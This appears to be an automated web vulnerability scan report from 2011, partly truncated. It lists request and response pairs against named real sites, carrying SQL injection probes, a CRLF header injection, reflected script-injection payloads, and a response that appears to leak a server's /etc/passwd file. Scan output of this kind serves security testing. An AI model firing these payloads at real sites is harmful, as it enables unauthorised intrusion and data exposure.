HTTP/1.1 404 Not Found Date: Mon, 13 Jun 2011 11:06:23 GMT P3P: policyref="http://info Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Server: YTS/1.19.5 Content-Length: 3717 <!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html><head><title>Yahoo! <script type="text/javascript"> document.location = 'http://searc ...[SNIP]... ref=http%3A%2F%2Fsports </script>/* nn4 hide */ /*/*/ body {font:small/1.2em arial,helvetica,clean html>body {font:83%/1.2em arial,helvetica,clean p {padding-bottom:6px #ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px h1 {font-size:135%;text form {position:relative #s1p {width:15em;margin-right: form span {position:absolute;left form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border /* end nn4 hide */ </style></head> <body><div id="doc"> <div id="ygma"><a href="http://us.rd.yahoo <div id="bd"><h1>Sorry, the page you requested was not found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://sports.yahoo.com |
Path: | /nba/news |
GET /nba'%20and%201%3d1--%20/news?slug=aw-wojnarowski Host: sports.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1W |
HTTP/1.1 404 Not Found Date: Mon, 13 Jun 2011 11:07:43 GMT P3P: policyref="http://info Vary: Host,Accept-Encoding Content-Type: text/html; charset=UTF-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Via: HTTP/1.1 r4.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19 Server: YTS/1.19.5 Content-Length: 3530 <!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html><head><title>Yahoo! <script type="text/javascript"> document.location = 'http://search.yahoo.com </script>/* nn4 hide */ /*/*/ body {font:small/1.2em arial,helvetica,clean html>body {font:83%/1.2em arial,helvetica,clean p {padding-bottom:6px #ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px h1 {font-size:135%;text form {position:relative #s1p {width:15em;margin-right: form span {position:absolute;left form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border /* end nn4 hide */ </style></head> <body><div id="doc"> <div id="ygma"><a href="http://us.rd.yahoo <div id="bd"><h1>Sorry, the page you requested was not found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo ...[SNIP]... |
GET /nba'%20and%201%3d2--%20/news?slug=aw-wojnarowski Host: sports.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1W |
HTTP/1.1 404 Not Found Date: Mon, 13 Jun 2011 11:07:43 GMT P3P: policyref="http://info Vary: Host,Accept-Encoding Content-Type: text/html; charset=UTF-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Via: HTTP/1.1 r2.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19 Server: YTS/1.19.5 Content-Length: 3520 <!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html><head><title>Yahoo! <script type="text/javascript"> document.location = 'http://search.yahoo.com </script>/* nn4 hide */ /*/*/ body {font:small/1.2em arial,helvetica,clean html>body {font:83%/1.2em arial,helvetica,clean p {padding-bottom:6px #ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px h1 {font-size:135%;text form {position:relative #s1p {width:15em;margin-right: form span {position:absolute;left form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border /* end nn4 hide */ </style></head> <body><div id="doc"> <div id="ygma"><a href="http://us.rd.yahoo <div id="bd"><h1>Sorry, the page you requested was not found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://sports.yahoo.com |
Path: | /nba/news |
GET /nba/news19672091'%20or%201%3d1-- Host: sports.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1W |
HTTP/1.1 404 Not Found Date: Mon, 13 Jun 2011 11:07:47 GMT P3P: policyref="http://info Vary: Host,Accept-Encoding Content-Type: text/html; charset=UTF-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Via: HTTP/1.1 r3.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19 Server: YTS/1.19.5 Content-Length: 3537 <!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html><head><title>Yahoo! <script type="text/javascript"> document.location = 'http://search.yahoo.com </script>/* nn4 hide */ /*/*/ body {font:small/1.2em arial,helvetica,clean html>body {font:83%/1.2em arial,helvetica,clean p {padding-bottom:6px #ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px h1 {font-size:135%;text form {position:relative #s1p {width:15em;margin-right: form span {position:absolute;left form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border /* end nn4 hide */ </style></head> <body><div id="doc"> <div id="ygma"><a href="http://us.rd.yahoo <div id="bd"><h1>Sorry, the page you requested was not found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo ...[SNIP]... |
GET /nba/news19672091'%20or%201%3d2-- Host: sports.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1W |
HTTP/1.1 404 Not Found Date: Mon, 13 Jun 2011 11:07:47 GMT P3P: policyref="http://info Vary: Host,Accept-Encoding Content-Type: text/html; charset=UTF-8 Cache-Control: private Age: 0 Proxy-Connection: keep-alive Via: HTTP/1.1 r4.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19 Server: YTS/1.19.5 Content-Length: 3527 <!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html><head><title>Yahoo! <script type="text/javascript"> document.location = 'http://search.yahoo.com </script>/* nn4 hide */ /*/*/ body {font:small/1.2em arial,helvetica,clean html>body {font:83%/1.2em arial,helvetica,clean p {padding-bottom:6px #ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px h1 {font-size:135%;text form {position:relative #s1p {width:15em;margin-right: form span {position:absolute;left form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border /* end nn4 hide */ </style></head> <body><div id="doc"> <div id="ygma"><a href="http://us.rd.yahoo <div id="bd"><h1>Sorry, the page you requested was not found.</h1> <p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.lijit.com |
Path: | /beacon |
GET /beacon?viewId=13079 Host: www.lijit.com Proxy-Connection: keep-alive Referer: http://www.mavsmoneyball User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ljt_ts=t=1305981518646479 |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:15:18 GMT Server: PWS/1.7.2.3 X-Px: ms iad-agg-n23 ( iad-agg-n7), ms iad-agg-n7 ( origin>CONN) P3P: CP="CUR ADM OUR NOR STA NID" Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0 Pragma: no-cache Expires: Mon, 13 Jun 2011 11:15:18 GMT Content-Length: 69 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Connection: keep-alive Set-Cookie: tpro_inst=bc491fffd0 Set-Cookie: tpro=eJxlUV1vhCAQ%2FC Set-Cookie: ljt_csync=dotomi%2Crtb <html> <head><title></title>< <body> </body> </html> |
GET /beacon?viewId=13079 Host: www.lijit.com Proxy-Connection: keep-alive Referer: http://www.mavsmoneyball User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ljt_ts=t=1305981518646479 |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:15:19 GMT Server: PWS/1.7.2.3 X-Px: ms iad-agg-n23 ( iad-agg-n18), ms iad-agg-n18 ( origin>CONN) P3P: CP="CUR ADM OUR NOR STA NID" Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0 Pragma: no-cache Expires: Mon, 13 Jun 2011 11:15:19 GMT Content-Length: 69 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Connection: keep-alive Set-Cookie: tpro_inst=deleted; expires=Sun, 13-Jun-2010 11:15:18 GMT; path=/; domain=.lijit.com Set-Cookie: ljt_csync=dotomi%2Crtb <html> <head><title></title>< <body> </body> </html> |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.mavsmoneyball |
Path: | /2011/6/12/2220848/nba |
GET /2011/6/12/2220848/nba Host: www.mavsmoneyball.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:07:49 GMT Server: Apache P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA" Cache-Control: private, max-age=0, must-revalidate Last-Modified: Mon, 13 Jun 2011 11:06:10 GMT ETag: "5e0038-1efa84-4a595 Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/html Content-Length: 2030212 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-eq ...[SNIP]... <script type="text/javascript" src="http://www.sbnation <link href="http://cdn0 <link href="http://cdn3 <link href="http://cdn3 <!--[if lte IE 7]> <link href="http://cdn2 <link href="http://cdn2 <![endif]--> <!--[if lte IE 6]> <link href="http://cdn2 <link href="http://cdn1 <![endif]--> <style type="text/css"><!-- body{background-image:url ...[SNIP]... |
GET /2011/6/12/2220848/nba Host: www.mavsmoneyball.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:07:50 GMT Server: Apache P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA" Cache-Control: private, max-age=0, must-revalidate Last-Modified: Mon, 13 Jun 2011 11:02:12 GMT ETag: "780110-1efa7a-4a595 Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/html Content-Length: 2030202 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-eq ...[SNIP]... <script type="text/javascript" src="http://www.sbnation <link href="http://cdn0 <link href="http://cdn3 <link href="http://cdn3 <!--[if lte IE 7]> <link href="http://cdn2 <link href="http://cdn2 <![endif]--> <!--[if lte IE 6]> <link href="http://cdn2 <link href="http://cdn1 <![endif]--> <style type="text/css"><!-- body{background-image:url ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.twackle.com |
Path: | /fansided/General_Twackle |
GET /fansided'/General_Twackle_Widget HTTP/1.1 Host: www.twackle.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 500 Internal Server Error Age: 0 Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Date: Mon, 13 Jun 2011 11:17:33 GMT P3P: CP="CAO PSA OUR" Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack) Status: 500 Via: 1.1 varnish X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7 X-Varnish: 1493755781 Content-Length: 1735 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta h ...[SNIP]... |
GET /fansided''/General_Twackle_Widget HTTP/1.1 Host: www.twackle.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Age: 0 Cache-Control: private, max-age=0, must-revalidate Content-Type: text/html; charset=utf-8 Date: Mon, 13 Jun 2011 11:17:34 GMT ETag: "d82f7b24bfcc87abc64 P3P: CP="CAO PSA OUR" Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack) Status: 200 Vary: Accept-Encoding Via: 1.1 varnish X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7 X-Runtime: 16 X-Varnish: 1493755835 Content-Length: 42 Connection: keep-alive Sorry but this page doesn't exist anymore. |
Severity: | High |
Confidence: | Firm |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding Cache-Control: max-age=3600 Date: Mon, 13 Jun 2011 11:09:34 GMT Content-Length: 2011 Connection: close root:x:0:0:root:/root:/bin bin:x:1:1:bin:/bin:/sbin daemon:x:2:2:daemon:/sbin adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdow ...[SNIP]... ucp:/sbin/nologin operator:x:11:0:operator: games:x:12:100:games:/usr gopher:x:13:30:gopher: ftp:x:14:50:FTP User:/var/ftp:/sbin nobody:x:99:99:Nobody:/:/sbin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin distcache:x:94:94 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /pfadj/imdb2.consumer |
GET /pfadj/imdb2.consumer Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.imdb.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 1016 DCLK_imp: v7;j;211364898;0-0;2 7db69468a61=1;~cs=i: Date: Mon, 13 Jun 2011 11:24:46 GMT document.write('<!-- Template ID = 15350 Template Name = !IMDb - Simple Image Template - DFP Upload -->\n\n<!--\nUSEFUL DFP PLACEHOLDERS :\n DFP Click Thru : http://ad.doubleclick.net ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /pfadj/imdb2.consumer |
GET /pfadj/imdb2.consumer Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.imdb.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 240 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:24:29 GMT Expires: Mon, 13 Jun 2011 11:24:29 GMT DCLK_imp: v7;j;44306;0-0;0;32554139 02125434862;~cs=t: document.write('<a target="_top" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /pfadx/fansided_cim/ |
GET /pfadx/fansided_cim/ Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 985 DCLK_imp: v7;x;241934735;0-0;0 4e1cfeec7e4=1;~cs=k: Date: Mon, 13 Jun 2011 11:02:01 GMT DoubleClick.onAdLoaded( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /pfadx/fansided_cim/ |
GET /pfadx/fansided_cim/ Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: video/x-ms-asf Content-Length: 237 Cache-Control: no-cache Pragma: no-cache Date: Mon, 13 Jun 2011 11:01:56 GMT Expires: Mon, 13 Jun 2011 11:01:56 GMT DCLK_imp: v7;x;44306;0-0;0;63616830 f9020d9662b;~cs=c: <a target="_top" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adsc/d724925/2/725047 |
GET /adsc/d724925/2/725047 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=40348193-10-1_898849 |
HTTP/1.1 200 OK Date: Mon, 13 Jun 2011 11:12:22 GMT Server: Apache-AdvancedExtra X-Powered-By: PHP/4.3.8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: a210.dl Set-Cookie: CS1=deleted; expires=Sun, 13-Jun-2010 11:12:21 GMT; path=/; domain=.questionmarket Set-Cookie: CS1=40348193-10-1_898849 Set-Cookie: ES=7f396 95abbdc4443_724925-zSN:M-0; expires=Fri, 03-Aug-2012 03:12:22 GMT; path=/; domain=.questionmarket Cache-Control: post-check=0, pre-check=0 Content-Length: 43 Content-Type: image/gif GIF89a.............!..... |
Severity: | High |
Confidence: | Certain |
Host: | http://d.adroll.com |
Path: | /c/N34ZPOW5TRGMJKDEFHM2G4 |
GET /c/58567%0d%0ab0067a605a1/SDUW4IOBWFCKJBD7TJN7TI Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __adroll=d10276ea02f |
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Mon, 13 Jun 2011 12:07:00 GMT Connection: keep-alive Set-Cookie: __adroll=d10276ea02f Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/r/58567 b0067a605a1/SDUW4IOBWFCKJBD7TJN7TI Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-407/d3/jsc/fm.js |
GET /bar/v16-407/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thesouthern.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=lYrOTcGt89Yz |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1190:6eb1e 31147183afa;expires=Tue, 14 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=826,276,14:1190,1 Set-Cookie: FFad=2:2:1:0:0;expires Set-Cookie: FFChanCap=1595B496,121 ETag: "2802d0e-87f1-4a4a58 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=63 Expires: Mon, 13 Jun 2011 11:08:52 GMT Date: Mon, 13 Jun 2011 11:07:49 GMT Content-Length: 2417 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',6eb1e 3114 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-407/d3/jsc/fmr |
GET /bar/v16-407/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thesouthern.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=lYrOTcGt89Yz |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1190:e47fa c6a295f0dc0;expires=Tue, 14 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=826,276,14:1190,1 Set-Cookie: FFad=2:2:1:0:0;expires Set-Cookie: FFChanCap=1595B496,121 ETag: "e2185d-85e6-4a4a581 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=65 Expires: Mon, 13 Jun 2011 11:08:52 GMT Date: Mon, 13 Jun 2011 11:07:47 GMT Content-Length: 2417 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',e47fa c6a2 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www22.glam.com |
Path: | /cTagsImgCmd.act |
GET /cTagsImgCmd.act?gtid Host: www22.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 302 Moved Temporarily Server: Apache Content-Length: 153 Content-Type: text/html Location: http://www35t.glam.com Set-Cookie: bc557 14ab2681ee8=D,T,5150,3726,2951,2705 ETag: "662c9bddfc82c61ba80 P3P: policyref="http://www Cache-Control: max-age=144 Date: Mon, 13 Jun 2011 11:02:54 GMT Connection: close Vary: Accept-Encoding <HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (302 Moved Temporarily) has occured in response to this request. </BODY> </HTML> |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.mtv/ent_010111 |
GET /adj/cm.mtvd7f41'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://viacom.adbureau User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 449 Vary: Accept-Encoding Date: Mon, 13 Jun 2011 11:23:29 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.mtv/ent_010111 |
GET /adj/cm.mtv/ent_0101113a0df'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://viacom.adbureau User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 449 Vary: Accept-Encoding Date: Mon, 13 Jun 2011 11:23:30 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.mtv/ent_010111 |
